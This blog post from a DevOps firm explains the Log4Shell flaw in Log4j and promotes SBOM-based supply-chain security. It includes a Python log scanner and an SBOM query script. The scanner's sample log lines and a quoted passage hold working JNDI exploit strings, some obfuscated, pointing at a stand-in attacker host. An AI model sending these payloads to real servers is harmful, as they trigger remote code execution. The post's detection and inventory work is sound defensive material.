Protect Your Software Supply Chain From Cyber Attacks - SBOM Security Explained
As Christmas approaches, technical infrastructure around the world is under attack through the Log4j vulnerability, CVE-2021-44228 (widely known as Log4Shell).
If you are unfamiliar with Log4j, a quick search for CVE-2021-44228 will bring you up to speed. In short:
Log4j is an open-source, Java-based logging library that lets developers log data from within their applications. It is part of Apache Logging Services, a project of the Apache Software Foundation. CVE-2021-44228 is a vulnerability in Log4j 2 (versions 2.0-beta9 through 2.14.1) that turns the logging of attacker-controlled text into remote code execution.
Log4j is used by thousands of websites and applications for everyday functions such as logging for debugging, auditing and monitoring, which is why the blast radius is so large.
What Is Log4j
According to infosecwriteups.com: “The vulnerability allows unauthenticated remote code execution. Attackers can take advantage of it by just inserting a line of code like ${jndi:ldap://[attacker_URL]}. This vulnerability can be found in products of some of the most famous technology vendors such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMWare.”
Log4j allows logged messages to contain lookup expressions of the form ${prefix:key} that are resolved when the message is formatted. One of those lookups, ${jndi:...}, retrieves a value through the Java Naming and Directory Interface (JNDI), which can fetch data remotely over several protocols, including the Lightweight Directory Access Protocol (LDAP), RMI and DNS.
Because the lookup is evaluated on whatever ends up in the log, an attacker who can get a string such as an HTTP User-Agent header or a chat message into a log line can point the lookup at an LDAP server they control, and a vulnerable version will load and execute the Java class that server hands back. Log4j 2.15.0 restricted JNDI by default and 2.16.0 removed message lookups entirely; the log4j2.formatMsgNoLookups mitigation was later found to be incomplete for some non-default configurations (CVE-2021-45046), so the answer is to upgrade to the current 2.17.x release rather than rely on a flag.
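The nesting described above is what defeats a naive grep for "${jndi:". The following Python script is an added example, not code from the original post or from the Log4j project: it reduces nested lookups the way Log4j's substitutor would (lower/upper, ":-default" fallbacks, URL encoding) before matching, and runs over a handful of constructed access-log lines. The IP 203.0.113.7 is a documentation address standing in for an attacker host; the log lines are made up for the example.

```python
"""Spot Log4Shell (CVE-2021-44228) probes in web-server access logs.

Rules that grep for the literal "${jndi:" miss most real traffic because
Log4j evaluates lookups recursively and attackers hide the keyword with
nested lookups such as ${${lower:j}ndi:...} or ${${::-j}ndi:...}, often
URL-encoded as well. This detector collapses the nesting first.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# An innermost ${...} expression: no further '${' or '}' inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalisation, e.g. ${jndi:ldap://203.0.113.7/a}
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve_inner(m: "re.Match[str]") -> str:
    """Evaluate one non-nested lookup as Log4j's StrSubstitutor would, as far
    as is possible offline. Unknown lookups keep their ':-default' value,
    which is exactly how attackers smuggle individual letters in."""
    body = m.group(1)
    prefix, sep, rest = body.partition(":")
    if prefix.strip().lower() == "jndi":
        return m.group(0)                    # keep the dangerous lookup intact for matching
    if ":-" in body:
        return body.split(":-", 1)[1]        # ${env:NOPE:-j}, ${sys:x:-j}, ${::-j}  ->  "j"
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return m.group(0)                        # ${date:...}, ${ctx:...}: harmless, left as-is


def normalize_lookups(s: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse nested lookups from the inside out until
    nothing changes (bounded, so a pathological line cannot spin forever)."""
    s = unquote(s)
    for _ in range(max_rounds):
        reduced = _INNER.sub(_resolve_inner, s)
        if reduced == s:
            break
        s = reduced
    return s


def find_jndi_lookups(line: str) -> List[str]:
    """Every JNDI lookup present in the line once the nesting is collapsed."""
    return _JNDI.findall(normalize_lookups(line))


def scan_access_log(lines: List[str]) -> List[Tuple[int, str]]:
    """(line number, normalised lookup) for each line carrying a probe."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for lookup in find_jndi_lookups(line):
            hits.append((n, lookup))
    return hits


# Constructed sample lines in combined-log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.7/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi'
    '%3Aldap%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1" 404 169 "-" "curl/7.79.1"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /docs/${date:yyyy} HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, lookup in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {lookup}")
```

Lines 1 to 3 are flagged and all three normalise to the same ${jndi:ldap://...} lookup, while the benign ${date:yyyy} on line 4 is left alone. The resolver deliberately knows nothing about ${env:...} or ${sys:...} beyond their ":-default" fallback, because the only thing that matters for detection is what survives the fallback.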
CISA Director Jen Easterly has called this security flaw the “most serious” vulnerability she has seen in her decades-long career and said it could take years to address.
Now is the time to take software supply chain security seriously.
What is Software Supply Chain Security
Software supply chain security is a term that has gained a lot of ground over the last two years, but most organizations have not adopted it with the seriousness it deserves. Your software supply chain is everything that goes into the software you ship and run: open-source components, software from third-party vendors, your own proprietary code, and the external APIs you consume, together with the build tooling, registries and pipelines that turn all of that into a deployable artifact. A weakness in any one of those links, such as a logging library pulled in transitively by a dependency you never chose, becomes a weakness in your product.
What Can I Do About It?
The first thing you need to do is adopt a solid vulnerability scanning tool and a regular scanning cadence. The right tool will be cross-platform and will show you exactly what needs to be addressed whether the target is a physical host, a virtual machine, a container image, or a running pod. Two caveats learned the hard way this week: a scanner can only report what is in its vulnerability database, so for a brand-new CVE the signatures may lag the disclosure by hours or days, and a scanner that only reads package-manager metadata will miss a log4j-core jar bundled inside a WAR or EAR or shaded into another jar. Pick a tool that inspects archives recursively, and verify it against a known-vulnerable test image before you trust a clean result.
Lamont Orange, CISO of Netskope, has some great advice for IT professionals:
1. Lead with empathy and reach out to your security circles.
2. Get the clearest possible understanding of what's happening in your environment.
3. Identify your true partners and make changes to those you do business with.
4. Share threat intelligence data without marketing in mind.
Tools That Can Help…SBOMs to the rescue!
A “Software Bill of Materials” (SBOM) is a nested inventory for software: a list of the ingredients that make up a piece of software, down to the components inside its components. This definition, and the minimum elements an SBOM should carry, were drafted by stakeholders in the US NTIA's open and transparent multistakeholder process to address transparency around software components, and were approved by consensus of the participating stakeholders.
We recently covered SBOMs on Cloud Drops Episode 001 on our YouTube channel, but here is the TL;DR:
Seriously look into generating SBOMs for your container images, libraries, binaries, applications, and clusters. When the next Log4Shell lands, the question “where do we run log4j-core below 2.15.0?” becomes a query over inventory you already hold instead of a fleet-wide rescan under pressure.
SBOM Generators:
Anchore Syft (scans container images, filesystems and archives; emits SPDX or CycloneDX): https://github.com/anchore/syft
GitHub Action for Syft: https://github.com/anchore/sbom-action
SPDX (Software Package Data Exchange), published as international open standard ISO/IEC 5962:2021 in August 2021: https://github.com/opensbom-generator/spdx-sbom-generator
CycloneDX CLI: https://github.com/CycloneDX/cyclonedx-cli
Kubernetes bom tool (SIG Release): https://sigs.k8s.io/bom
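Generating the SBOM is only half of the value; the other half is querying it. The following Python script is an added example, not code from the original post, from Syft or from any of the projects listed above. It takes an SBOM in either of the two formats those generators emit (CycloneDX JSON with possibly nested components, or SPDX JSON with purl external references), and reports every log4j-core component whose version Apache's advisory lists as affected by CVE-2021-44228. Matching is done on the package URL (purl) rather than the bare name, so a shaded or nested jar is found and an unrelated package that happens to be called log4j-core is not. The two SBOM documents embedded in it are constructed by hand in the shape Syft produces; the artifact names in them are invented.

```python
"""Query SBOMs for components affected by CVE-2021-44228 (Log4Shell)."""
import json
import re
from typing import Dict, Iterable, List, Tuple

LOG4J_CORE_PURL = "pkg:maven/org.apache.logging.log4j/log4j-core@"


def parse_version(v: str) -> Tuple[Tuple[int, ...], str]:
    """'2.0-beta9' -> ((2, 0), 'beta9'); '2.14.1' -> ((2, 14, 1), '')."""
    base, _, pre = v.partition("-")
    return tuple(int(x) for x in re.findall(r"\d+", base)), pre.lower()


def affected_by_cve_2021_44228(version: str) -> bool:
    """Apache's advisory: log4j-core 2.0-beta9 through 2.14.1 is affected.
    2.15.0 fixed it, and 2.3.1 (Java 6) / 2.12.2 (Java 7) are fixed backports."""
    nums, pre = parse_version(version)
    if not nums or nums[0] != 2:
        return False                      # 1.x is end-of-life with its own CVEs, but not this one
    if nums == (2, 0) and pre:
        m = re.fullmatch(r"beta(\d+)", pre)
        if m:
            return int(m.group(1)) >= 9   # 2.0-beta9 onward; rc1/rc2 came after beta9
        return pre.startswith("rc")
    if nums[:2] == (2, 3) and nums >= (2, 3, 1):
        return False
    if nums[:2] == (2, 12) and nums >= (2, 12, 2):
        return False
    return (2, 0) <= nums <= (2, 14, 1)


def _purls_cyclonedx(components: Iterable[Dict]) -> Iterable[str]:
    for c in components:
        if "purl" in c:
            yield c["purl"]
        # A component may contain components of its own (a jar inside a war).
        yield from _purls_cyclonedx(c.get("components", []))


def _purls_spdx(packages: Iterable[Dict]) -> Iterable[str]:
    for p in packages:
        for ref in p.get("externalRefs", []):
            if ref.get("referenceType") == "purl":
                yield ref["referenceLocator"]


def purls_from_sbom(doc: Dict) -> List[str]:
    """Every purl in a CycloneDX JSON or SPDX JSON document."""
    if doc.get("bomFormat") == "CycloneDX":
        return list(_purls_cyclonedx(doc.get("components", [])))
    if "spdxVersion" in doc:
        return list(_purls_spdx(doc.get("packages", [])))
    raise ValueError("unrecognised SBOM format")


def vulnerable_log4j(doc: Dict) -> List[str]:
    """purls of log4j-core components in the SBOM that are affected."""
    hits = []
    for purl in purls_from_sbom(doc):
        if purl.startswith(LOG4J_CORE_PURL):
            version = purl[len(LOG4J_CORE_PURL):].split("?", 1)[0]  # drop purl qualifiers
            if affected_by_cve_2021_44228(version):
                hits.append(purl)
    return hits


# Constructed sample SBOMs in the shape syft emits (artifact names invented).
CYCLONEDX_SAMPLE = json.loads("""{
  "bomFormat": "CycloneDX", "specVersion": "1.3", "version": 1,
  "components": [
    {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-api", "version": "2.14.1",
     "purl": "pkg:maven/org.apache.logging.log4j/log4j-api@2.14.1"},
    {"type": "application", "name": "shop.war", "version": "1.0",
     "components": [
       {"type": "library", "group": "org.apache.logging.log4j", "name": "log4j-core", "version": "2.14.1",
        "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"}]},
    {"type": "library", "name": "log4j-core", "version": "0.1", "purl": "pkg:npm/log4j-core@0.1"}
  ]}""")

SPDX_SAMPLE = json.loads("""{
  "spdxVersion": "SPDX-2.2", "SPDXID": "SPDXRef-DOCUMENT", "name": "api-service",
  "packages": [
    {"name": "log4j-core", "SPDXID": "SPDXRef-Package-1", "versionInfo": "2.17.1",
     "externalRefs": [{"referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl",
                       "referenceLocator": "pkg:maven/org.apache.logging.log4j/log4j-core@2.17.1"}]}
  ]}""")

if __name__ == "__main__":
    for name, doc in (("shop.war image", CYCLONEDX_SAMPLE), ("api-service", SPDX_SAMPLE)):
        print(name, "->", vulnerable_log4j(doc) or "clean")
```

To run it against a real image, produce the input with Syft, for example `syft <image> -o cyclonedx-json > sbom.json`, then `json.load` the file and pass it to `vulnerable_log4j`. Note that log4j-api is deliberately not flagged: the lookup code lives in log4j-core, and the unrelated npm package named log4j-core is skipped because its purl is not the Maven coordinate.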
ThnkBIG is a global technology services, solutions, and staffing firm specializing in Kubernetes implementation and operationalization and DevOps cloud services for small and medium-sized businesses, SMB commercial, and government customers. As the number one DevOps, Kubernetes, and cloud management subject matter experts in Austin, Texas, our managed and consulting services are first class and enterprise ready, and we scale as your business needs increase. With our cloud-native expertise, we operationalize Kubernetes environments both large and small using best practices, automation, cloud-native open-source tools, and technology.